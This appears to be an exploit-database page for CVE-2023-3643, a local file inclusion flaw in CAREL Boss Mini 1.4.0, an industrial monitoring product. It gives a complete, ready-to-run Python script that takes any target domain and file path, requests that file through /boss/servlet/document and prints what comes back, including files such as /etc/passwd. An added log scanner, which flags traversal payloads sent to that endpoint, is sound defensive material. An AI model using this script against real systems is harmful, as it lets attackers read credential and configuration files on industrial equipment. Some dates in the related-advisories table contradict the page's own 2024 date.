
Boss Mini 1.4.0 - local file inclusion

Date: 03 Mar 2024 | Reported by: nltt0 | Type: exploitdb | Source: www.exploit-db.com

Boss Mini 1.4.0 local file inclusion exploit

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Boss Mini 1.4.0 - local file inclusion Exploit | 4 Mar 2024 00:00 | zdt |
| Circl | CVE-2023-3643 | 12 Jul 2023 22:25 | circl |
| CNNVD | Carel Boss Mini security vulnerability | 12 Jul 2023 00:00 | cnnvd |
| CVE | CVE-2023-3643 | 12 Jul 2023 17:31 | cve |
| Cvelist | CVE-2023-3643 Boss Mini document file inclusion | 12 Jul 2023 17:31 | cvelist |
| Exploit DB | Boss Mini v1.4.0 - Local File Inclusion (LFI) | 3 Mar 2026 00:00 | exploitdb |
| EUVD | EUVD-2023-44287 | 12 Jul 2023 17:31 | euvd |
| ICS | CAREL Boss-Mini | 20 Jun 2024 06:00 | ics |
| Nuclei | CAREL Boss Mini <= 1.4.0 - Local File Inclusion | 3 Jun 2026 06:04 | nuclei |
| NVD | CVE-2023-3643 | 12 Jul 2023 18:15 | nvd |

Code
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: nltt0 (https://github.com/nltt-br)
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))
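
A defensive counterpart to the PoC above, added here and not part of the original exploit or of any CAREL code: it scans request records for POSTs to `/boss/servlet/document` whose `path` field decodes to an absolute path or a traversal sequence. The record tuple format, the sample data, and the rule that legitimate `path` values are relative names are assumptions.

```python
from urllib.parse import parse_qs, unquote

# Endpoint and form field as used by the PoC on this page.
ENDPOINT = "/boss/servlet/document"
FIELD = "path"

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; the PoC's value arrives double-encoded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path(value):
    """Return a reason if the value is not a plain relative name, else None.
    Assumption: legitimate requests only send relative document names."""
    p = decode_fully(value).replace("\\", "/")
    if "\x00" in p:
        return "null byte"
    if p.startswith("/") or p[1:2] == ":":
        return "absolute path"
    if ".." in p.split("/"):
        return "directory traversal"
    return None

def scan(records):
    """records: (method, uri, body) tuples from a log that captures bodies."""
    hits = []
    for i, (method, uri, body) in enumerate(records):
        if method != "POST" or uri.split("?", 1)[0] != ENDPOINT:
            continue
        for value in parse_qs(body, keep_blank_values=True).get(FIELD, []):
            reason = suspicious_path(value)
            if reason:
                hits.append((i, reason))
    return hits

# Constructed sample records, not captured traffic.
SAMPLE = [
    ("POST", "/boss/servlet/document", "path=%252Fetc%252Fpasswd"),
    ("POST", "/boss/servlet/document", "path=reports%2Fdaily.pdf"),
    ("POST", "/boss/servlet/document", "path=..%2F..%2Fconf%2Fserver.xml"),
    ("GET", "/boss/app/report/popup.html", ""),
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Standard web access logs do not record POST bodies, so this check needs a source that does, such as a reverse proxy or WAF log.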
